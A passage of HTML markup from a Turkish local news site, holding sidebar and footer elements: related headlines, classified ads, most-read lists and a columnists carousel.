      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="https://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="https://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="https://www.elbistaninsesi.com/haberleri/Drone+destekli+trafik+denetimleri+yap%C4%B1lacak" title="Drone Destekli Trafik Denetimleri Yapılacak haberleri">Drone Destekli Trafik Denetimleri Yapılacak</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/tarim-kredi-marketin-elbistan-subesi-aciliyor-h71454.html"  title="Tarım Kredi Market’in Elbistan Şubesi açılıyor">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/tarim_kredi_marketin_elbistan_subesi_aciliyor_h71454_08f4c.JPG" alt="Tarım Kredi Market’in Elbistan Şubesi açılıyor" />
        <span>Tarım Kredi Market’in Elbistan Şubesi açılıyor</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/jandarma-trafikten-ogrencilere-egitim-semineri-h71453.html"  title="Jandarma Trafik’ten öğrencilere eğitim semineri">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/jandarma_trafikten_ogrencilere_egitim_semineri_h71453_e1ad7.jpg" alt="Jandarma Trafik’ten öğrencilere eğitim semineri" />
        <span>Jandarma Trafik’ten öğrencilere eğitim semineri</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/kahramanmaras-cift-doz-asida-maviye-bir-adim-daha-yaklasti-h71452.html"  title="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/kahramanmaras_cift_doz_asida_maviye_bir_adim_daha_yaklasti_h71452_73f7c.jpg" alt="Kahramanmaraş, çift doz aşıda maviye bir adım daha yaklaştı" />
        <span>Kahramanmaraş, çift doz aşıda maviye bir adım...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/elbistan-belediyesi-cozumu-vatandasin-ayagina-goturecek-h71451.html"  title="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/elbistan_belediyesi_cozumu_vatandasin_ayagina_goturecek_h71451_66dd3.jpg" alt="Elbistan Belediyesi, çözümü vatandaşın ayağına götürecek" />
        <span>Elbistan Belediyesi, çözümü vatandaşın ayağına...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/balda-gruplar-belli-oldu-h71449.html"  title="BAL’da gruplar belli oldu">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/balda_gruplar_belli_oldu_h71449_6ba94.jpg" alt="BAL’da gruplar belli oldu" />
        <span>BAL’da gruplar belli oldu</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/bahcesehir-koleji-ogrencilerini-teknoloji-ile-bulusturuyor-h71448.html"  title="Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/bahcesehir_koleji_ogrencilerini_teknoloji_ile_bulusturuyor_h71448_2f191.jpg" alt="Bahçeşehir Koleji öğrencilerini teknoloji ile buluşturuyor" />
        <span>Bahçeşehir Koleji öğrencilerini teknoloji ile...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/tes-iste-secim-sureci-basladi-2-h71447.html"  title="Tes-İş’te seçim süreci başladı">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/tes_iste_secim_sureci_basladi_h71447_d4ef6.jpg" alt="Tes-İş’te seçim süreci başladı" />
        <span>Tes-İş’te seçim süreci başladı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="https://www.elbistaninsesi.com/guncel/evinin-onunde-cinayete-kurban-gitti-h71446.html"  title="Evinin önünde cinayete kurban gitti">
        <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/evinin_onunde_cinayete_kurban_gitti_h71446_59008.jpg" alt="Evinin önünde cinayete kurban gitti" />
        <span>Evinin önünde cinayete kurban gitti</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="https://www.elbistaninsesi.com/images/sayfalar/4-Ekim-2021.jpg" title="Elbistanın Sesi - 04.10.2021 Manşeti" target="_blank"><img src="https://www.elbistaninsesi.com/images/sayfalar/thumb_4-Ekim-2021.jpg" alt="Elbistanın Sesi - 04.10.2021 Manşeti" /></a>
           </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5>
        <a style="margin-top:10px;" href="https://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a>
        <a style="margin-right:65px;font-size:140%;color:red;" href="https://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a>
      </h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/hyranus-et-ve-balik-restaurant-13742.html" title="HYRANUS ET VE BALIK RESTAURANT" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="HYRANUS ET VE BALIK RESTAURANT">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/hyranus-et-ve-balik-restaurant-13742.html" title="HYRANUS ET VE BALIK RESTAURANT">HYRANUS ET VE BALIK RESTAURANT</a></h4>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/markette-calismak-icin-bayan-elaman-13741.html" title="Markette çalışmak için  bayan elaman" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Markette çalışmak için  bayan elaman">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/markette-calismak-icin-bayan-elaman-13741.html" title="Markette çalışmak için  bayan elaman">Markette çalışmak için  bayan elaman</a></h4>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/sevim-optikde-calisacak-bayan-personel-araniyor-13737.html" title="Sevim Optikde çalışacak bayan Personel aranıyor." >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Sevim Optikde çalışacak bayan Personel aranıyor.">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/sevim-optikde-calisacak-bayan-personel-araniyor-13737.html" title="Sevim Optikde çalışacak bayan Personel aranıyor.">Sevim Optikde çalışacak bayan Personel aranıyor.</a></h4>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/servis-elemanirehabilitasyon-merkezi-13736.html" title="SERVİS ELEMANI/REHABİLİTASYON MERKEZİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="SERVİS ELEMANI/REHABİLİTASYON MERKEZİ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/servis-elemanirehabilitasyon-merkezi-13736.html" title="SERVİS ELEMANI/REHABİLİTASYON MERKEZİ">SERVİS ELEMANI/REHABİLİTASYON MERKEZİ</a></h4>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/devren-satilik-isyeri-13735.html" title="DEVREN  SATILIK İŞYERİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="DEVREN  SATILIK İŞYERİ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/devren-satilik-isyeri-13735.html" title="DEVREN  SATILIK İŞYERİ">DEVREN  SATILIK İŞYERİ</a></h4>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13734.html" title="bayan eleman" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="bayan eleman">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/bayan-eleman-13734.html" title="bayan eleman">bayan eleman</a></h4>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/seri-ilanlar/kafede-calistirilmak-uzere-13733.html" title="Kafede çalıştırılmak üzere" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Kafede çalıştırılmak üzere">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/seri-ilanlar/kafede-calistirilmak-uzere-13733.html" title="Kafede çalıştırılmak üzere">Kafede çalıştırılmak üzere</a></h4>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/guncel/otomobilin-carptigi-motosiklet-surucusu-yasamini-yitirdi-h71284.html" title="Otomobilin çarptığı motosiklet..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/otomobilin_carptigi_motosiklet_surucusu_yasamini_yitirdi_h71284_f4c99.jpg" alt="Otomobilin çarptığı motosiklet..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/otomobilin-carptigi-motosiklet-surucusu-yasamini-yitirdi-h71284.html" title="" ><span class="en-hit">1.</span> <strong>Otomobilin çarptığı motosiklet...</strong> <span class="en-spot en-hidden">Elbistan’da, arızalanan motosikletini kontrol etmek için yol kenarında...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/fatih-menges-22-yasinda-h71187.html" title="Fatih Mengeş 22 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/fatih_menges_22_yasinda_h71187_d5a44.jpg" alt="Fatih Mengeş 22 yaşında" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/fatih-menges-22-yasinda-h71187.html" title="" ><span class="en-hit">2.</span> <strong>Fatih Mengeş 22 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/pankobirlik-eski-baskani-halil-aslan-hayatini-kaybetti-h71404.html" title="Pankobirlik eski başkanı Halil Aslan..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/pankobirlik_eski_baskani_halil_aslan_hayatini_kaybetti_h71404_255d9.jpg" alt="Pankobirlik eski başkanı Halil Aslan..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/pankobirlik-eski-baskani-halil-aslan-hayatini-kaybetti-h71404.html" title="" ><span class="en-hit">3.</span> <strong>Pankobirlik eski başkanı Halil Aslan...</strong> <span class="en-spot en-hidden">Pancar Ekicileri Kooperatifi (Pankobirlik) Elbistan Şubesinin 30 sene...</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/halil-vicdan-32-yasinda-h71141.html" title="Halil Vicdan 32 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/halil_vicdan_32_yasinda_h71141_0f74d.jpg" alt="Halil Vicdan 32 yaşında" ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/halil-vicdan-32-yasinda-h71141.html" title="" ><span class="en-hit">4.</span> <strong>Halil Vicdan 32 yaşında</strong> <span class="en-spot en-hidden">Halil Vicdan 32 yaşında</span></a></div></li>
              		              			<li class="en-hidden"><a href="https://www.elbistaninsesi.com/guncel/takla-atan-otomobilin-surucusu-hayatini-kaybetti-2-h71347.html" title="Takla atan otomobilin sürücüsü..." class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/takla_atan_otomobilin_surucusu_hayatini_kaybetti_h71347_f1e17.jpg" alt="Takla atan otomobilin sürücüsü..." ></a><div class="en-right"><a href="https://www.elbistaninsesi.com/guncel/takla-atan-otomobilin-surucusu-hayatini-kaybetti-2-h71347.html" title="" ><span class="en-hit">5.</span> <strong>Takla atan otomobilin sürücüsü...</strong> <span class="en-spot en-hidden">İzmir&#039;de meydana gelen trafik kazasında; takla atan otomobilin...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="https://www.elbistaninsesi.com/vefatlar/rafet-saydam-h71277.html" title="Rafet Saydam" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/rafet_saydam_h71277_9fdf8.jpg" alt="Rafet Saydam"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/rafet-saydam-h71277.html" title="" ><span class="en-hit">1.</span> <strong>Rafet Saydam</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/ibrahim-gunes-56-yasinda-h71154.html" title="İbrahim Güneş 56 yaşında," class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/ibrahim_gunes_56_yasinda_h71154_51231.jpg" alt="İbrahim Güneş 56 yaşında,"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/ibrahim-gunes-56-yasinda-h71154.html" title="" ><span class="en-hit">2.</span> <strong>İbrahim Güneş 56 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/halil-aslan-87-yasinda-h71405.html" title="Halil Aslan 87 yaşında" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/10/halil_aslan_87_yasinda_h71405_3ef4a.jpg" alt="Halil Aslan 87 yaşında"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/halil-aslan-87-yasinda-h71405.html" title="" ><span class="en-hit">3.</span> <strong>Halil Aslan 87 yaşında</strong> <span class="en-spot en-hidden">Halil Aslan 87 yaşında</span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/mehmet-cevik-h71130.html" title="Mehmet Çevik" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/mehmet_cevik_h71130_b01b3.jpg" alt="Mehmet Çevik"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/mehmet-cevik-h71130.html" title="" ><span class="en-hit">4.</span> <strong>Mehmet Çevik</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="https://www.elbistaninsesi.com/vefatlar/ahmet-bulut-h71201.html" title="Ahmet Bulut" class="en-left"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/ahmet_bulut_h71201_4464c.jpg" alt="Ahmet Bulut"></a><div class="en-right"><a href="https://www.elbistaninsesi.com/vefatlar/ahmet-bulut-h71201.html" title="" ><span class="en-hit">5.</span> <strong>Ahmet Bulut</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="https://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/biz-ne-isek-o-olalim-makale,6340.html" title="BİZ NE İSEK O OLALIM" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="https://www.elbistaninsesi.com/biz-ne-isek-o-olalim-makale,6340.html" title="BİZ NE İSEK O OLALIM" >BİZ NE İSEK O OLALIM</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/oyun-ve-cocuk-makale,6339.html" title="Oyun ve Çocuk" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/tuğba.jpg" alt="Tuğba Arıkan">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/101/tugba-arikan" title="Tuğba Arıkan">Tuğba Arıkan</a></h4>
              <a href="https://www.elbistaninsesi.com/oyun-ve-cocuk-makale,6339.html" title="Oyun ve Çocuk" >Oyun ve Çocuk</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-17-makale,6338.html" title="TEC­RÜ­BE İLE SABİT -17-" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="https://www.elbistaninsesi.com/tecrube-ile-sabit-17-makale,6338.html" title="TEC­RÜ­BE İLE SABİT -17-" >TEC­RÜ­BE İLE SABİT -17-</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistan-mukrimin-halil-lisesindeki-talebelik-yillarim-ve-saygideger-hocalarim-onuncu-fasil-makale,6337.html" title="ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!  (Onuncu Fasıl)" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistan-mukrimin-halil-lisesindeki-talebelik-yillarim-ve-saygideger-hocalarim-onuncu-fasil-makale,6337.html" title="ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!  (Onuncu Fasıl)" >ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!  (Onuncu Fasıl)</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/el-vurdu-sen-vurma-makale,6336.html" title="EL VURDU SEN VURMA" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="https://www.elbistaninsesi.com/el-vurdu-sen-vurma-makale,6336.html" title="EL VURDU SEN VURMA" >EL VURDU SEN VURMA</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/alim-makale,6335.html" title="ALİ’M" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="https://www.elbistaninsesi.com/alim-makale,6335.html" title="ALİ’M" >ALİ’M</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tutarsiz-ve-kisiligi-iplige-donenler-makale,6334.html" title="Tutarsız ve Kişiliği İpliğe Dönenler" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="https://www.elbistaninsesi.com/tutarsiz-ve-kisiligi-iplige-donenler-makale,6334.html" title="Tutarsız ve Kişiliği İpliğe Dönenler" >Tutarsız ve Kişiliği İpliğe Dönenler</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/hallaci-mansur-makale,6331.html" title="HAL­LA­CI MAN­SUR" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="https://www.elbistaninsesi.com/hallaci-mansur-makale,6331.html" title="HAL­LA­CI MAN­SUR" >HAL­LA­CI MAN­SUR</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahmet-buluta-ithafen-makale,6330.html" title="AHMET BULUT’A İTHAFEN" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="https://www.elbistaninsesi.com/ahmet-buluta-ithafen-makale,6330.html" title="AHMET BULUT’A İTHAFEN" >AHMET BULUT’A İTHAFEN</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kim-kalmis-baki-makale,6327.html" title="KİM KAL­MIŞ BAKİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="https://www.elbistaninsesi.com/kim-kalmis-baki-makale,6327.html" title="KİM KAL­MIŞ BAKİ" >KİM KAL­MIŞ BAKİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/yitirin-beni-kendisine-yazdigi-agit-makale,6326.html" title="YİTİRİN BENİ (Ken­di­si­ne Yaz­dı­ğı Ağıt)" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="https://www.elbistaninsesi.com/yitirin-beni-kendisine-yazdigi-agit-makale,6326.html" title="YİTİRİN BENİ (Ken­di­si­ne Yaz­dı­ğı Ağıt)" >YİTİRİN BENİ (Ken­di­si­ne Yaz­dı­ğı Ağıt)</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/ahmet-hocamiz-makale,6324.html" title="AHMET HO­CA­MIZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="https://www.elbistaninsesi.com/ahmet-hocamiz-makale,6324.html" title="AHMET HO­CA­MIZ" >AHMET HO­CA­MIZ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/arf-hocanin-dedigi-gibi-makale,6323.html" title="ARF HOCANIN DEDİĞİ GİBİ…" >
